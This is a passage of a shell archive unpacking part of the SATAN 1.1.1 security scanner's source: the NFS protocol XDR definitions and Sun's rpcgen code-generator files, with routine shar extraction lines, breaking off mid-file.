Xconst NFS_MAXNAMLEN = 255;
Xconst NFS_FHSIZE = 32;
Xconst NFS_COOKIESIZE = 4;
Xconst NFS_FIFO_DEV = -1; /* size kludge for named pipes */
X
X/*
X * File types
X */
Xconst NFSMODE_FMT = 0170000; /* type of file */
Xconst NFSMODE_DIR = 0040000; /* directory */
Xconst NFSMODE_CHR = 0020000; /* character special */
Xconst NFSMODE_BLK = 0060000; /* block special */
Xconst NFSMODE_REG = 0100000; /* regular */
Xconst NFSMODE_LNK = 0120000; /* symbolic link */
Xconst NFSMODE_SOCK = 0140000; /* socket */
Xconst NFSMODE_FIFO = 0010000; /* fifo */
X
X/*
X * Error status
X */
Xenum nfsstat {
X NFS_OK= 0, /* no error */
X NFSERR_PERM=1, /* Not owner */
X NFSERR_NOENT=2, /* No such file or directory */
X NFSERR_IO=5, /* I/O error */
X NFSERR_NXIO=6, /* No such device or address */
X NFSERR_ACCES=13, /* Permission denied */
X NFSERR_EXIST=17, /* File exists */
X NFSERR_NODEV=19, /* No such device */
X NFSERR_NOTDIR=20, /* Not a directory*/
X NFSERR_ISDIR=21, /* Is a directory */
X NFSERR_FBIG=27, /* File too large */
X NFSERR_NOSPC=28, /* No space left on device */
X NFSERR_ROFS=30, /* Read-only file system */
X NFSERR_NAMETOOLONG=63, /* File name too long */
X NFSERR_NOTEMPTY=66, /* Directory not empty */
X NFSERR_DQUOT=69, /* Disc quota exceeded */
X NFSERR_STALE=70, /* Stale NFS file handle */
X NFSERR_WFLUSH=99 /* write cache flushed */
X};
X
X/*
X * File types
X */
Xenum ftype {
X NFNON = 0, /* non-file */
X NFREG = 1, /* regular file */
X NFDIR = 2, /* directory */
X NFBLK = 3, /* block special */
X NFCHR = 4, /* character special */
X NFLNK = 5, /* symbolic link */
X NFSOCK = 6, /* unix domain sockets */
X NFBAD = 7, /* unused */
X NFFIFO = 8 /* named pipe */
X};
X
X/*
X * File access handle
X */
Xstruct nfs_fh {
X opaque data[NFS_FHSIZE];
X};
X
X/*
X * Timeval
X */
Xstruct nfstime {
X unsigned seconds;
X unsigned useconds;
X};
X
X
X/*
X * File attributes
X */
Xstruct fattr {
X ftype type; /* file type */
X unsigned mode; /* protection mode bits */
X unsigned nlink; /* # hard links */
X unsigned uid; /* owner user id */
X unsigned gid; /* owner group id */
X unsigned size; /* file size in bytes */
X unsigned blocksize; /* prefered block size */
X unsigned rdev; /* special device # */
X unsigned blocks; /* Kb of disk used by file */
X unsigned fsid; /* device # */
X unsigned fileid; /* inode # */
X nfstime atime; /* time of last access */
X nfstime mtime; /* time of last modification */
X nfstime ctime; /* time of last change */
X};
X
X/*
X * File attributes which can be set
X */
Xstruct sattr {
X unsigned mode; /* protection mode bits */
X unsigned uid; /* owner user id */
X unsigned gid; /* owner group id */
X unsigned size; /* file size in bytes */
X nfstime atime; /* time of last access */
X nfstime mtime; /* time of last modification */
X};
X
X
Xtypedef string filename<NFS_MAXNAMLEN>;
Xtypedef string nfspath<NFS_MAXPATHLEN>;
X
X/*
X * Reply status with file attributes
X */
Xunion attrstat switch (nfsstat status) {
Xcase NFS_OK:
X fattr attributes;
Xdefault:
X void;
X};
X
Xstruct sattrargs {
X nfs_fh file;
X sattr attributes;
X};
X
X/*
X * Arguments for directory operations
X */
Xstruct diropargs {
X nfs_fh dir; /* directory file handle */
X filename name; /* name (up to NFS_MAXNAMLEN bytes) */
X};
X
Xstruct diropokres {
X nfs_fh file;
X fattr attributes;
X};
X
X/*
X * Results from directory operation
X */
Xunion diropres switch (nfsstat status) {
Xcase NFS_OK:
X diropokres diropres;
Xdefault:
X void;
X};
X
Xunion readlinkres switch (nfsstat status) {
Xcase NFS_OK:
X nfspath data;
Xdefault:
X void;
X};
X
X/*
X * Arguments to remote read
X */
Xstruct readargs {
X nfs_fh file; /* handle for file */
X unsigned offset; /* byte offset in file */
X unsigned count; /* immediate read count */
X unsigned totalcount; /* total read count (from this offset)*/
X};
X
X/*
X * Status OK portion of remote read reply
X */
Xstruct readokres {
X fattr attributes; /* attributes, need for pagin*/
X opaque data<NFS_MAXDATA>;
X};
X
Xunion readres switch (nfsstat status) {
Xcase NFS_OK:
X readokres reply;
Xdefault:
X void;
X};
X
X/*
X * Arguments to remote write
X */
Xstruct writeargs {
X nfs_fh file; /* handle for file */
X unsigned beginoffset; /* beginning byte offset in file */
X unsigned offset; /* current byte offset in file */
X unsigned totalcount; /* total write count (to this offset)*/
X opaque data<NFS_MAXDATA>;
X};
X
Xstruct createargs {
X diropargs where;
X sattr attributes;
X};
X
Xstruct renameargs {
X diropargs from;
X diropargs to;
X};
X
Xstruct linkargs {
X nfs_fh from;
X diropargs to;
X};
X
Xstruct symlinkargs {
X diropargs from;
X nfspath to;
X sattr attributes;
X};
X
X
Xtypedef opaque nfscookie[NFS_COOKIESIZE];
X
X/*
X * Arguments to readdir
X */
Xstruct readdirargs {
X nfs_fh dir; /* directory handle */
X nfscookie cookie;
X unsigned count; /* number of directory bytes to read */
X};
X
Xstruct entry {
X unsigned fileid;
X filename name;
X nfscookie cookie;
X entry *nextentry;
X};
X
Xstruct dirlist {
X entry *entries;
X bool eof;
X};
X
Xunion readdirres switch (nfsstat status) {
Xcase NFS_OK:
X dirlist reply;
Xdefault:
X void;
X};
X
Xstruct statfsokres {
X unsigned tsize; /* preferred transfer size in bytes */
X unsigned bsize; /* fundamental file system block size */
X unsigned blocks; /* total blocks in file system */
X unsigned bfree; /* free blocks in fs */
X unsigned bavail; /* free blocks avail to non-superuser */
X};
X
Xunion statfsres switch (nfsstat status) {
Xcase NFS_OK:
X statfsokres reply;
Xdefault:
X void;
X};
X
X/*
X * Remote file service routines
X */
Xprogram NFS_PROGRAM {
X version NFS_VERSION {
X void
X NFSPROC_NULL(void) = 0;
X
X attrstat
X NFSPROC_GETATTR(nfs_fh) = 1;
X
X attrstat
X NFSPROC_SETATTR(sattrargs) = 2;
X
X void
X NFSPROC_ROOT(void) = 3;
X
X diropres
X NFSPROC_LOOKUP(diropargs) = 4;
X
X readlinkres
X NFSPROC_READLINK(nfs_fh) = 5;
X
X readres
X NFSPROC_READ(readargs) = 6;
X
X void
X NFSPROC_WRITECACHE(void) = 7;
X
X attrstat
X NFSPROC_WRITE(writeargs) = 8;
X
X diropres
X NFSPROC_CREATE(createargs) = 9;
X
X nfsstat
X NFSPROC_REMOVE(diropargs) = 10;
X
X nfsstat
X NFSPROC_RENAME(renameargs) = 11;
X
X nfsstat
X NFSPROC_LINK(linkargs) = 12;
X
X nfsstat
X NFSPROC_SYMLINK(symlinkargs) = 13;
X
X diropres
X NFSPROC_MKDIR(createargs) = 14;
X
X nfsstat
X NFSPROC_RMDIR(diropargs) = 15;
X
X readdirres
X NFSPROC_READDIR(readdirargs) = 16;
X
X statfsres
X NFSPROC_STATFS(nfs_fh) = 17;
X } = 2;
X} = 100003;
X
END_OF_FILE
if test 7868 -ne `wc -c <'satan-1.1.1/src/nfs-chk/nfs_prot.x'`; then
echo shar: \"'satan-1.1.1/src/nfs-chk/nfs_prot.x'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/nfs-chk/nfs_prot.x'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_cout.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_cout.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_cout.c'\" $7792 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_cout.c' <<'END_OF_FILE'
X/* @(#)rpc_cout.c 2.1 88/08/01 4.0 RPCSRC */

Xstatic char sccsid[] = "@(#)rpc_cout.c 1.8 87/06/24 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_cout.c, XDR routine outputter for the RPC protocol compiler

X * Copyright (C) 1987, Sun Microsystems, Inc.
X */
X#include <stdio.h>

X#include <string.h>
X#include <stdlib.h>
X#include <unistd.h>

X#include "rpc_util.h"
X#include "rpc_parse.h"
X
Xstatic print_header();
Xstatic print_trailer();
Xstatic space();
Xstatic emit_enum();
Xstatic emit_union();
Xstatic emit_struct();
Xstatic emit_typedef();
Xstatic print_stat();
X
X/*
X * Emit the C-routine for the given definition
X */
Xvoid
Xemit(def)
X definition *def;
X{
X if (def->def_kind == DEF_PROGRAM || def->def_kind == DEF_CONST) {
X return;
X }
X print_header(def);
X switch (def->def_kind) {
X case DEF_UNION:
X emit_union(def);
X break;
X case DEF_ENUM:
X emit_enum(def);
X break;
X case DEF_STRUCT:
X emit_struct(def);
X break;
X case DEF_TYPEDEF:
X emit_typedef(def);
X break;
X }
X print_trailer();
X}
X
Xstatic
Xfindtype(def, type)
X definition *def;
X char *type;
X{
X if (def->def_kind == DEF_PROGRAM || def->def_kind == DEF_CONST) {

X return (0);
X } else {

X return (streq(def->def_name, type));
X }
X}
X
Xstatic
Xundefined(type)
X char *type;

X{
X definition *def;
X

X def = (definition *) FINDVAL(defined, type, findtype);
X return (def == NULL);
X}
X
X
Xstatic
Xprint_header(def)
X definition *def;
X{
X space();
X f_print(fout, "bool_t\n");
X f_print(fout, "xdr_%s(xdrs, objp)\n", def->def_name);
X f_print(fout, "\tXDR *xdrs;\n");
X f_print(fout, "\t%s ", def->def_name);
X if (def->def_kind != DEF_TYPEDEF ||
X !isvectordef(def->def.ty.old_type, def->def.ty.rel)) {
X f_print(fout, "*");
X }
X f_print(fout, "objp;\n");
X f_print(fout, "{\n");
X}
X
Xstatic
Xprint_trailer()
X{
X f_print(fout, "\treturn (TRUE);\n");
X f_print(fout, "}\n");
X space();
X}
X
X
Xstatic
Xprint_ifopen(indent, name)
X int indent;
X char *name;
X{
X tabify(fout, indent);
X f_print(fout, "if (!xdr_%s(xdrs", name);
X}
X
X
Xstatic
Xprint_ifarg(arg)
X char *arg;
X{
X f_print(fout, ", %s", arg);
X}
X
X
Xstatic
Xprint_ifsizeof(prefix, type)
X char *prefix;
X char *type;
X{
X if (streq(type, "bool")) {
X f_print(fout, ", sizeof(bool_t), xdr_bool");
X } else {
X f_print(fout, ", sizeof(");
X if (undefined(type) && prefix) {
X f_print(fout, "%s ", prefix);
X }
X f_print(fout, "%s), xdr_%s", type, type);
X }
X}
X
Xstatic
Xprint_ifclose(indent)
X int indent;
X{
X f_print(fout, ")) {\n");
X tabify(fout, indent);
X f_print(fout, "\treturn (FALSE);\n");
X tabify(fout, indent);
X f_print(fout, "}\n");
X}
X
Xstatic
Xspace()
X{
X f_print(fout, "\n\n");
X}
X
Xstatic
Xprint_ifstat(indent, prefix, type, rel, amax, objname, name)
X int indent;
X char *prefix;
X char *type;
X relation rel;
X char *amax;
X char *objname;
X char *name;
X{
X char *alt = NULL;
X
X switch (rel) {
X case REL_POINTER:
X print_ifopen(indent, "pointer");
X print_ifarg("(char **)");
X f_print(fout, "%s", objname);
X print_ifsizeof(prefix, type);
X break;
X case REL_VECTOR:
X if (streq(type, "string")) {
X alt = "string";
X } else if (streq(type, "opaque")) {
X alt = "opaque";
X }
X if (alt) {
X print_ifopen(indent, alt);
X print_ifarg(objname);
X } else {
X print_ifopen(indent, "vector");
X print_ifarg("(char *)");
X f_print(fout, "%s", objname);
X }
X print_ifarg(amax);
X if (!alt) {
X print_ifsizeof(prefix, type);
X }
X break;
X case REL_ARRAY:
X if (streq(type, "string")) {
X alt = "string";
X } else if (streq(type, "opaque")) {
X alt = "bytes";
X }
X if (streq(type, "string")) {
X print_ifopen(indent, alt);
X print_ifarg(objname);
X } else {
X if (alt) {
X print_ifopen(indent, alt);
X } else {
X print_ifopen(indent, "array");
X }
X print_ifarg("(char **)");
X if (*objname == '&') {
X f_print(fout, "%s.%s_val, (u_int *)%s.%s_len",
X objname, name, objname, name);
X } else {
X f_print(fout, "&%s->%s_val, (u_int *)&%s->%s_len",
X objname, name, objname, name);
X }
X }
X print_ifarg(amax);
X if (!alt) {
X print_ifsizeof(prefix, type);
X }
X break;
X case REL_ALIAS:
X print_ifopen(indent, type);
X print_ifarg(objname);
X break;
X }
X print_ifclose(indent);
X}
X
X
X/* ARGSUSED */
Xstatic
Xemit_enum(def)
X definition *def;
X{
X print_ifopen(1, "enum");
X print_ifarg("(enum_t *)objp");
X print_ifclose(1);
X}
X
X
Xstatic
Xemit_union(def)
X definition *def;
X{
X declaration *dflt;
X case_list *cl;
X declaration *cs;
X char *object;
X char *vectorfmt = "objp->%s_u.%s";
X char *format = "&objp->%s_u.%s";
X
X print_stat(&def->def.un.enum_decl);
X f_print(fout, "\tswitch (objp->%s) {\n", def->def.un.enum_decl.name);
X for (cl = def->def.un.cases; cl != NULL; cl = cl->next) {
X cs = &cl->case_decl;
X f_print(fout, "\tcase %s:\n", cl->case_name);
X if (!streq(cs->type, "void")) {
X object = alloc(strlen(def->def_name) + strlen(format) +
X strlen(cs->name) + 1);
X if (isvectordef(cs->type, cs->rel)) {
X s_print(object, vectorfmt, def->def_name,
X cs->name);
X } else {
X s_print(object, format, def->def_name,
X cs->name);
X }
X print_ifstat(2, cs->prefix, cs->type, cs->rel, cs->array_max,
X object, cs->name);
X free(object);
X }
X f_print(fout, "\t\tbreak;\n");
X }
X dflt = def->def.un.default_decl;
X if (dflt != NULL) {
X if (!streq(dflt->type, "void")) {
X f_print(fout, "\tdefault:\n");
X object = alloc(strlen(def->def_name) + strlen(format) +
X strlen(dflt->name) + 1);
X if (isvectordef(dflt->type, dflt->rel)) {
X s_print(object, vectorfmt, def->def_name,
X dflt->name);
X } else {
X s_print(object, format, def->def_name,
X dflt->name);
X }
X print_ifstat(2, dflt->prefix, dflt->type, dflt->rel,
X dflt->array_max, object, dflt->name);
X free(object);
X f_print(fout, "\t\tbreak;\n");
X }
X } else {
X f_print(fout, "\tdefault:\n");
X f_print(fout, "\t\treturn (FALSE);\n");
X }
X f_print(fout, "\t}\n");
X}
X
X
X
Xstatic
Xemit_struct(def)
X definition *def;
X{
X decl_list *dl;
X
X for (dl = def->def.st.decls; dl != NULL; dl = dl->next) {
X print_stat(&dl->decl);

X }
X}
X
X
X
X

Xstatic
Xemit_typedef(def)
X definition *def;
X{
X char *prefix = def->def.ty.old_prefix;
X char *type = def->def.ty.old_type;
X char *amax = def->def.ty.array_max;
X relation rel = def->def.ty.rel;
X
X print_ifstat(1, prefix, type, rel, amax, "objp", def->def_name);

X}
X
X
X
X
X

Xstatic
Xprint_stat(dec)
X declaration *dec;
X{
X char *prefix = dec->prefix;
X char *type = dec->type;
X char *amax = dec->array_max;
X relation rel = dec->rel;
X char name[256];
X
X if (isvectordef(type, rel)) {
X s_print(name, "objp->%s", dec->name);
X } else {
X s_print(name, "&objp->%s", dec->name);
X }
X print_ifstat(1, prefix, type, rel, amax, name, dec->name);
X}
END_OF_FILE
if test 7792 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_cout.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_cout.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_cout.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_hout.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_hout.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_hout.c'\" $8395 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_hout.c' <<'END_OF_FILE'
X/* @(#)rpc_hout.c 2.1 88/08/01 4.0 RPCSRC */

Xstatic char sccsid[] = "@(#)rpc_hout.c 1.6 87/07/28 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_hout.c, Header file outputter for the RPC protocol compiler

X * Copyright (C) 1987, Sun Microsystems, Inc.
X */

X#include <stdlib.h>
X#include <unistd.h>
X#include <stdio.h>
X#include <ctype.h>
X#include "rpc_util.h"
X#include "rpc_parse.h"
X
Xstatic pconstdef();
Xstatic pstructdef();
Xstatic puniondef();
Xstatic pdefine();
Xstatic pprogramdef();
Xstatic penumdef();
Xstatic ptypedef();
Xstatic pdeclaration();
Xstatic undefined2();
X
X/*
X * Print the C-version of an xdr definition
X */
Xvoid
Xprint_datadef(def)
X definition *def;
X{
X if (def->def_kind != DEF_CONST) {
X f_print(fout, "\n");
X }
X switch (def->def_kind) {
X case DEF_STRUCT:
X pstructdef(def);
X break;
X case DEF_UNION:
X puniondef(def);
X break;
X case DEF_ENUM:
X penumdef(def);
X break;
X case DEF_TYPEDEF:
X ptypedef(def);
X break;
X case DEF_PROGRAM:
X pprogramdef(def);
X break;
X case DEF_CONST:
X pconstdef(def);
X break;
X }
X if (def->def_kind != DEF_PROGRAM && def->def_kind != DEF_CONST) {
X f_print(fout, "bool_t xdr_%s();\n", def->def_name);
X }
X if (def->def_kind != DEF_CONST) {
X f_print(fout, "\n");
X }
X}
X
Xstatic
Xpconstdef(def)
X definition *def;
X{
X pdefine(def->def_name, def->def.co);
X}
X
Xstatic
Xpstructdef(def)
X definition *def;
X{
X decl_list *l;
X char *name = def->def_name;
X
X f_print(fout, "struct %s {\n", name);
X for (l = def->def.st.decls; l != NULL; l = l->next) {
X pdeclaration(name, &l->decl, 1);
X }
X f_print(fout, "};\n");
X f_print(fout, "typedef struct %s %s;\n", name, name);
X}
X
Xstatic
Xpuniondef(def)
X definition *def;
X{
X case_list *l;
X char *name = def->def_name;
X declaration *decl;
X
X f_print(fout, "struct %s {\n", name);
X decl = &def->def.un.enum_decl;
X if (streq(decl->type, "bool")) {
X f_print(fout, "\tbool_t %s;\n", decl->name);
X } else {
X f_print(fout, "\t%s %s;\n", decl->type, decl->name);
X }
X f_print(fout, "\tunion {\n");
X for (l = def->def.un.cases; l != NULL; l = l->next) {
X pdeclaration(name, &l->case_decl, 2);
X }
X decl = def->def.un.default_decl;
X if (decl && !streq(decl->type, "void")) {
X pdeclaration(name, decl, 2);
X }
X f_print(fout, "\t} %s_u;\n", name);
X f_print(fout, "};\n");
X f_print(fout, "typedef struct %s %s;\n", name, name);

X}
X
X
X
Xstatic

Xpdefine(name, num)
X char *name;
X char *num;
X{
X f_print(fout, "#define %s %s\n", name, num);
X}
X
Xstatic
Xpuldefine(name, num)
X char *name;
X char *num;
X{
X f_print(fout, "#define %s ((u_long)%s)\n", name, num);
X}
X
Xstatic
Xdefine_printed(stop, start)
X proc_list *stop;
X version_list *start;
X{
X version_list *vers;
X proc_list *proc;
X
X for (vers = start; vers != NULL; vers = vers->next) {
X for (proc = vers->procs; proc != NULL; proc = proc->next) {
X if (proc == stop) {
X return (0);
X } else if (streq(proc->proc_name, stop->proc_name)) {

X return (1);
X }
X }

X }
X abort();

X /* NOTREACHED */
X}
X
X

Xstatic
Xpprogramdef(def)
X definition *def;
X{
X version_list *vers;
X proc_list *proc;
X
X puldefine(def->def_name, def->def.pr.prog_num);
X for (vers = def->def.pr.versions; vers != NULL; vers = vers->next) {
X puldefine(vers->vers_name, vers->vers_num);
X for (proc = vers->procs; proc != NULL; proc = proc->next) {
X if (!define_printed(proc, def->def.pr.versions)) {
X puldefine(proc->proc_name, proc->proc_num);
X }
X pprocdef(proc, vers);

X }
X }
X}
X
X

Xpprocdef(proc, vp)
X proc_list *proc;
X version_list *vp;
X{
X f_print(fout, "extern ");
X if (proc->res_prefix) {
X if (streq(proc->res_prefix, "enum")) {
X f_print(fout, "enum ");
X } else {
X f_print(fout, "struct ");
X }
X }
X if (streq(proc->res_type, "bool")) {
X f_print(fout, "bool_t *");
X } else if (streq(proc->res_type, "string")) {
X f_print(fout, "char **");
X } else {
X f_print(fout, "%s *", fixtype(proc->res_type));
X }
X pvname(proc->proc_name, vp->vers_num);
X f_print(fout, "();\n");
X}
X
Xstatic
Xpenumdef(def)
X definition *def;
X{
X char *name = def->def_name;
X enumval_list *l;
X char *last = NULL;
X int count = 0;
X
X f_print(fout, "enum %s {\n", name);
X for (l = def->def.en.vals; l != NULL; l = l->next) {
X f_print(fout, "\t%s", l->name);
X if (l->assignment) {
X f_print(fout, " = %s", l->assignment);
X last = l->assignment;
X count = 1;
X } else {
X if (last == NULL) {
X f_print(fout, " = %d", count++);
X } else {
X f_print(fout, " = %s + %d", last, count++);
X }
X }
X f_print(fout, ",\n");
X }
X f_print(fout, "};\n");
X f_print(fout, "typedef enum %s %s;\n", name, name);
X}
X
Xstatic
Xptypedef(def)
X definition *def;
X{
X char *name = def->def_name;
X char *old = def->def.ty.old_type;
X char prefix[8]; /* enough to contain "struct ", including NUL */
X relation rel = def->def.ty.rel;
X
X
X if (!streq(name, old)) {
X if (streq(old, "string")) {
X old = "char";
X rel = REL_POINTER;
X } else if (streq(old, "opaque")) {
X old = "char";
X } else if (streq(old, "bool")) {
X old = "bool_t";
X }
X if (undefined2(old, name) && def->def.ty.old_prefix) {
X s_print(prefix, "%s ", def->def.ty.old_prefix);
X } else {
X prefix[0] = 0;
X }
X f_print(fout, "typedef ");
X switch (rel) {
X case REL_ARRAY:
X f_print(fout, "struct {\n");
X f_print(fout, "\tu_int %s_len;\n", name);
X f_print(fout, "\t%s%s *%s_val;\n", prefix, old, name);
X f_print(fout, "} %s", name);
X break;
X case REL_POINTER:
X f_print(fout, "%s%s *%s", prefix, old, name);
X break;
X case REL_VECTOR:
X f_print(fout, "%s%s %s[%s]", prefix, old, name,
X def->def.ty.array_max);
X break;
X case REL_ALIAS:
X f_print(fout, "%s%s %s", prefix, old, name);
X break;
X }
X f_print(fout, ";\n");
X }
X}
X
X
Xstatic
Xpdeclaration(name, dec, tab)
X char *name;
X declaration *dec;
X int tab;
X{
X char buf[8]; /* enough to hold "struct ", include NUL */
X char *prefix;
X char *type;
X

X if (streq(dec->type, "void")) {
X return;
X }

X tabify(fout, tab);
X if (streq(dec->type, name) && !dec->prefix) {
X f_print(fout, "struct ");
X }
X if (streq(dec->type, "string")) {
X f_print(fout, "char *%s", dec->name);
X } else {
X prefix = "";
X if (streq(dec->type, "bool")) {
X type = "bool_t";
X } else if (streq(dec->type, "opaque")) {
X type = "char";
X } else {
X if (dec->prefix) {
X s_print(buf, "%s ", dec->prefix);
X prefix = buf;
X }
X type = dec->type;
X }
X switch (dec->rel) {
X case REL_ALIAS:
X f_print(fout, "%s%s %s", prefix, type, dec->name);
X break;
X case REL_VECTOR:
X f_print(fout, "%s%s %s[%s]", prefix, type, dec->name,
X dec->array_max);
X break;
X case REL_POINTER:
X f_print(fout, "%s%s *%s", prefix, type, dec->name);
X break;
X case REL_ARRAY:
X f_print(fout, "struct {\n");
X tabify(fout, tab);
X f_print(fout, "\tu_int %s_len;\n", dec->name);
X tabify(fout, tab);
X f_print(fout, "\t%s%s *%s_val;\n", prefix, type, dec->name);
X tabify(fout, tab);
X f_print(fout, "} %s", dec->name);
X break;
X }
X }
X f_print(fout, ";\n");
X}
X
X
X
Xstatic
Xundefined2(type, stop)
X char *type;
X char *stop;
X{
X list *l;
X definition *def;
X
X for (l = defined; l != NULL; l = l->next) {
X def = (definition *) l->val;
X if (def->def_kind != DEF_PROGRAM) {
X if (streq(def->def_name, stop)) {
X return (1);
X } else if (streq(def->def_name, type)) {

X return (0);
X }
X }
X }

X return (1);
X}
END_OF_FILE

if test 8395 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_hout.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_hout.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_hout.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_util.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_util.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_util.c'\" $7839 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_util.c' <<'END_OF_FILE'
X/* @(#)rpc_util.c 2.1 88/08/01 4.0 RPCSRC */

Xstatic char sccsid[] = "@(#)rpc_util.c 1.5 87/06/24 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_util.c, Utility routines for the RPC protocol compiler

X * Copyright (C) 1987, Sun Microsystems, Inc.
X */

X#include <stdlib.h>
X#include <unistd.h>
X#include <stdio.h>

X#include "rpc_scan.h"
X#include "rpc_parse.h"
X#include "rpc_util.h"
X
Xchar curline[MAXLINESIZE]; /* current read line */
Xchar *where = curline; /* current point in line */
Xint linenum = 0; /* current line number */
X
Xchar *infilename; /* input filename */
X
X#define NFILES 4
Xchar *outfiles[NFILES]; /* output file names */
Xint nfiles;
X
XFILE *fout; /* file pointer of current output */
XFILE *fin; /* file pointer of current input */
X
Xlist *defined; /* list of defined things */
X
Xstatic printwhere();
X
X/*
X * Reinitialize the world
X */
Xreinitialize()
X{
X memset(curline, 0, MAXLINESIZE);
X where = curline;
X linenum = 0;
X defined = NULL;
X}
X
X/*
X * string equality
X */
Xstreq(a, b)
X char *a;
X char *b;
X{
X return (strcmp(a, b) == 0);
X}
X
X/*
X * find a value in a list
X */
Xchar *
Xfindval(lst, val, cmp)
X list *lst;
X char *val;
X int (*cmp) ();
X
X{
X for (; lst != NULL; lst = lst->next) {
X if ((*cmp) (lst->val, val)) {
X return (lst->val);
X }
X }
X return (NULL);
X}
X
X/*
X * store a value in a list
X */
Xvoid
Xstoreval(lstp, val)
X list **lstp;
X char *val;
X{
X list **l;
X list *lst;
X
X for (l = lstp; *l != NULL; l = (list **) & (*l)->next);
X lst = ALLOC(list);
X lst->val = val;
X lst->next = NULL;
X *l = lst;
X}
X
X
Xstatic
Xfindit(def, type)
X definition *def;
X char *type;
X{
X return (streq(def->def_name, type));
X}
X
X
Xstatic char *
Xfixit(type, orig)
X char *type;
X char *orig;

X{
X definition *def;
X

X def = (definition *) FINDVAL(defined, type, findit);
X if (def == NULL || def->def_kind != DEF_TYPEDEF) {
X return (orig);
X }
X switch (def->def.ty.rel) {
X case REL_VECTOR:
X return (def->def.ty.old_type);
X case REL_ALIAS:
X return (fixit(def->def.ty.old_type, orig));
X default:
X return (orig);
X }
X}
X
Xchar *
Xfixtype(type)
X char *type;
X{
X return (fixit(type, type));
X}
X
Xchar *
Xstringfix(type)
X char *type;
X{
X if (streq(type, "string")) {
X return ("wrapstring");
X } else {
X return (type);
X }
X}
X
Xvoid
Xptype(prefix, type, follow)
X char *prefix;
X char *type;
X int follow;
X{
X if (prefix != NULL) {
X if (streq(prefix, "enum")) {
X f_print(fout, "enum ");
X } else {
X f_print(fout, "struct ");
X }
X }
X if (streq(type, "bool")) {
X f_print(fout, "bool_t ");
X } else if (streq(type, "string")) {
X f_print(fout, "char *");
X } else {
X f_print(fout, "%s ", follow ? fixtype(type) : type);

X }
X}
X
X
Xstatic

Xtypedefed(def, type)
X definition *def;
X char *type;
X{
X if (def->def_kind != DEF_TYPEDEF || def->def.ty.old_prefix != NULL) {
X return (0);
X } else {
X return (streq(def->def_name, type));
X }
X}
X
Xisvectordef(type, rel)
X char *type;
X relation rel;

X{
X definition *def;
X

X for (;;) {
X switch (rel) {
X case REL_VECTOR:
X return (!streq(type, "string"));
X case REL_ARRAY:
X return (0);
X case REL_POINTER:
X return (0);
X case REL_ALIAS:
X def = (definition *) FINDVAL(defined, type, typedefed);
X if (def == NULL) {
X return (0);
X }
X type = def->def.ty.old_type;
X rel = def->def.ty.rel;

X }
X }
X}
X
X

Xstatic char *
Xlocase(str)
X char *str;
X{
X char c;
X static char buf[100];
X char *p = buf;
X
X while (c = *str++) {
X *p++ = (c >= 'A' && c <= 'Z') ? (c - 'A' + 'a') : c;

X }
X *p = 0;

X return (buf);
X}
X
X
Xvoid
Xpvname(pname, vnum)
X char *pname;
X char *vnum;
X{
X f_print(fout, "%s_%s", locase(pname), vnum);
X}
X
X
X/*
X * print a useful (?) error message, and then die
X */
Xvoid
Xerror(msg)
X char *msg;
X{
X printwhere();
X f_print(stderr, "%s, line %d: ", infilename, linenum);
X f_print(stderr, "%s\n", msg);
X crash();
X}
X
X/*
X * Something went wrong, unlink any files that we may have created and then
X * die.
X */
Xcrash()

X{
X int i;
X

X for (i = 0; i < nfiles; i++) {
X (void) unlink(outfiles[i]);
X }
X exit(1);
X}
X
X
Xvoid
Xrecord_open(file)
X char *file;
X{
X if (nfiles < NFILES) {
X outfiles[nfiles++] = file;
X } else {
X f_print(stderr, "too many files!\n");

X crash();
X }
X}
X

Xstatic char expectbuf[100];
Xstatic char *toktostr();
X
X/*
X * error, token encountered was not the expected one
X */
Xvoid
Xexpected1(exp1)
X tok_kind exp1;
X{
X s_print(expectbuf, "expected '%s'",
X toktostr(exp1));
X error(expectbuf);
X}
X
X/*
X * error, token encountered was not one of two expected ones
X */
Xvoid
Xexpected2(exp1, exp2)
X tok_kind exp1, exp2;
X{
X s_print(expectbuf, "expected '%s' or '%s'",
X toktostr(exp1),
X toktostr(exp2));
X error(expectbuf);
X}
X
X/*
X * error, token encountered was not one of 3 expected ones
X */
Xvoid
Xexpected3(exp1, exp2, exp3)
X tok_kind exp1, exp2, exp3;
X{
X s_print(expectbuf, "expected '%s', '%s' or '%s'",
X toktostr(exp1),
X toktostr(exp2),
X toktostr(exp3));
X error(expectbuf);
X}
X
Xvoid
Xtabify(f, tab)
X FILE *f;
X int tab;
X{
X while (tab--) {
X (void) fputc('\t', f);

X }
X}
X
X
X

Xstatic token tokstrings[] = {
X {TOK_IDENT, "identifier"},
X {TOK_CONST, "const"},
X {TOK_RPAREN, ")"},
X {TOK_LPAREN, "("},
X {TOK_RBRACE, "}"},
X {TOK_LBRACE, "{"},
X {TOK_LBRACKET, "["},
X {TOK_RBRACKET, "]"},
X {TOK_STAR, "*"},
X {TOK_COMMA, ","},
X {TOK_EQUAL, "="},
X {TOK_COLON, ":"},
X {TOK_SEMICOLON, ";"},
X {TOK_UNION, "union"},
X {TOK_STRUCT, "struct"},

X {TOK_SWITCH, "switch"},
